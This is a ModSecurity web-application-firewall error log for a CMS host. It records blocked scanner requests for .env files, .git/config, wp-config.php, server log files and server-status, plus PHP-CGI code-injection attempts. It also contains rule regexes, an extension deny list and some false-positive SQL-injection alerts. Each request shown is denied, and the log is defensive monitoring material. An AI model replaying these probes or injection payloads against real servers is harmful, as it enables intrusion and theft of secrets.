.inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/app/logs/prod.log"] [unique_id "aS-Q_XNBDHsFUfi9HNuLBQAAAQY"] [Wed Dec 03 03:23:10.271584 2025] [:error] [pid 12722:tid 12730] [client 35.183.34.35:51210] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/app/logs/dev.log"] [unique_id "aS-Q_uYpmpGv-D9ngeOSmgAAAYM"] [Wed Dec 03 03:23:10.618245 2025] [:error] [pid 13040:tid 13057] [client 35.183.34.35:51324] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/application.log"] [unique_id "aS-Q_nFBi_x_qNHD--N4qgAAAgQ"] [Wed Dec 03 03:23:13.475730 2025] [:error] [pid 12722:tid 12746] [client 35.183.34.35:51960] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aS-RAeYpmpGv-D9ngeOSpgAAAZM"] [Wed Dec 03 03:23:13.804055 2025] [:error] [pid 12722:tid 12730] [client 35.183.34.35:52040] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aS-RAeYpmpGv-D9ngeOSpwAAAYM"] [Wed Dec 03 03:23:14.155625 2025] [:error] [pid 12722:tid 12729] [client 35.183.34.35:52120] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/errors.log"] [unique_id "aS-RAuYpmpGv-D9ngeOSqgAAAYI"] [Wed Dec 03 03:23:14.504909 2025] [:error] [pid 12722:tid 12736] [client 35.183.34.35:52198] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/php_error.log"] [unique_id "aS-RAuYpmpGv-D9ngeOSrAAAAYk"] [Wed Dec 03 03:23:15.677188 2025] [:error] [pid 12722:tid 12732] [client 35.183.34.35:52508] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/var/log/apache2/error.log"] [unique_id "aS-RA-YpmpGv-D9ngeOSsAAAAYU"] [Wed Dec 03 03:23:16.028967 2025] [:error] [pid 12722:tid 12737] [client 35.183.34.35:52786] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/var/log/nginx/error.log"] [unique_id "aS-RBOYpmpGv-D9ngeOSsgAAAYo"] [Wed Dec 03 03:23:16.942214 2025] [:error] [pid 12722:tid 12750] [client 35.183.34.35:53072] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/error.log"] [unique_id "aS-RBOYpmpGv-D9ngeOStwAAAZc"] [Wed Dec 03 03:23:17.293651 2025] [:error] [pid 12578:tid 12593] [client 35.183.34.35:53228] [client 35.183.34.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/log/error.log"] [unique_id "aS-RBXNBDHsFUfi9HNuLCgAAAQ0"] [Sat Dec 06 00:55:00.788748 2025] [:error] [pid 965:tid 996] [client 167.99.182.39:49748] [client 167.99.182.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aTNixLLQTT-3O2AswVW7rAAAAM4"] [Sat Dec 06 00:55:01.231715 2025] [:error] [pid 639:tid 743] [client 167.99.182.39:36502] [client 167.99.182.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aTNixTeXdJBLnL7ePRq6-AAAAIE"] [Sat Dec 06 00:55:08.834451 2025] [authz_core:error] [pid 639:tid 743] [client 167.99.182.39:51332] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Sat Dec 06 00:55:09.444925 2025] [authz_core:error] [pid 30163:tid 30194] [client 167.99.182.39:41716] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Sat Dec 06 00:57:54.354042 2025] [:error] [pid 30163:tid 30192] [client 167.71.175.236:50550] [client 167.71.175.236] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aTNjcoD6TOYS0ETt25YuOAAAAQ4"] [Sat Dec 06 00:58:00.709739 2025] [:error] [pid 639:tid 746] [client 206.189.95.232:44464] [client 206.189.95.232] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aTNjeDeXdJBLnL7ePRq75gAAAII"] [Sat Dec 06 00:58:02.452464 2025] [authz_core:error] [pid 639:tid 759] [client 167.71.175.236:45174] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Sat Dec 06 00:58:08.833700 2025] [authz_core:error] [pid 639:tid 774] [client 206.189.95.232:44508] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Sat Dec 06 15:37:30.283752 2025] [:error] [pid 27206:tid 27288] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aTQxmjVNQf_oW9-JXCpPvQAAAJg"], referer: https://www.google.com/ [Sat Dec 06 15:37:30.436327 2025] [:error] [pid 27206:tid 27252] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env"] [unique_id "aTQxmjVNQf_oW9-JXCpPvwAAAIM"], referer: https://www.google.com/ [Sat Dec 06 15:37:30.610433 2025] [:error] [pid 27206:tid 27283] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/.git/config"] [unique_id "aTQxmjVNQf_oW9-JXCpPwAAAAJU"], referer: https://www.google.com/ [Sat Dec 06 15:37:30.741947 2025] [:error] [pid 27206:tid 27249] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/backend/.env"] [unique_id "aTQxmjVNQf_oW9-JXCpPwQAAAIE"], referer: https://www.google.com/ [Sat Dec 06 15:37:30.864755 2025] [:error] [pid 27206:tid 27248] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/admin/.env"] [unique_id "aTQxmjVNQf_oW9-JXCpPwwAAAIA"], referer: https://www.google.com/ [Sat Dec 06 15:37:30.979645 2025] [:error] [pid 27206:tid 27263] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.bak"] [unique_id "aTQxmjVNQf_oW9-JXCpPxAAAAIo"], referer: https://www.google.com/ [Sat Dec 06 15:37:31.166257 2025] [:error] [pid 27206:tid 27250] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/.git/logs/HEAD"] [unique_id "aTQxmzVNQf_oW9-JXCpPxQAAAII"], referer: https://www.google.com/ [Sat Dec 06 15:37:31.299121 2025] [:error] [pid 27206:tid 27278] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/wp-config.php"] [unique_id "aTQxmzVNQf_oW9-JXCpPxgAAAJI"], referer: https://www.google.com/ [Sat Dec 06 15:37:31.462579 2025] [:error] [pid 27206:tid 27274] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match 